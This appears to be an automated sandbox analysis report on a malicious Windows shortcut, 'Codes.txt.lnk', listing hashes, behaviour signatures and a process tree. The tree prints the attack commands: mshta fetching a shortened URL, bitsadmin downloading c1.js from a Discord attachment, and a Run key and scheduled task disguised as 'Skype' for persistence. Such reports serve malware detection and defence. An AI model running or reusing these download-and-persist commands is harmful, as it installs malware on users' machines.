Analysis
-
max time kernel
1789s -
max time network
1799s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
02-08-2021 20:16
Static task
static1
Behavioral task
behavioral1
Sample
Codes.txt.lnk
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Codes.txt.lnk
Resource
win10v20210410
General
-
Target
Codes.txt.lnk
-
Size
1KB
-
MD5
537399896538f5897c325a350603a567
-
SHA1
0a2ff41a38f91f79dde2a579138396bc5e5a7378
-
SHA256
91b660e99b14d4d790953f9db3ba34d046d494624b53f53ef646fab40c64ace2
-
SHA512
fb61b629d1ba6c38164bf21a637a28dc741fe29df47ae81af0e448273b30a60504085f94ee3d31e981ca9d23ba7517a13ac4a8a4e805a13999d67bd29daec030
Malware Config
Extracted
https://bit.ly/3j6OXnh
Signatures
-
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exeWScript.exeflow pid process 8 1656 mshta.exe 10 1656 mshta.exe 12 1656 mshta.exe 14 1656 mshta.exe 22 2336 WScript.exe -
Drops startup file 1 IoCs
Processes:
WScript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1.js WScript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
WScript.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\JJM3W6LMN3 = "\"C:\\Users\\Admin\\AppData\\Roaming\\c1.js\"" WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Modifies registry class 1 IoCs
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings mshta.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exemshta.exeWScript.exedescription pid process target process PID 3560 wrote to memory of 1656 3560 cmd.exe mshta.exe PID 3560 wrote to memory of 1656 3560 cmd.exe mshta.exe PID 1656 wrote to memory of 3996 1656 mshta.exe bitsadmin.exe PID 1656 wrote to memory of 3996 1656 mshta.exe bitsadmin.exe PID 1656 wrote to memory of 2336 1656 mshta.exe WScript.exe PID 1656 wrote to memory of 2336 1656 mshta.exe WScript.exe PID 2336 wrote to memory of 212 2336 WScript.exe schtasks.exe PID 2336 wrote to memory of 212 2336 WScript.exe schtasks.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Codes.txt.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "https://bit.ly/3j6OXnh"2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://cdn.discordapp.com/attachments/870779144429006911/870824147524157480/c1.js C:\Users\Admin\AppData\Local\Temp\c1.js3⤵
- Download via BitsAdmin
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1.js"3⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\c1.js4⤵
- Creates scheduled task(s)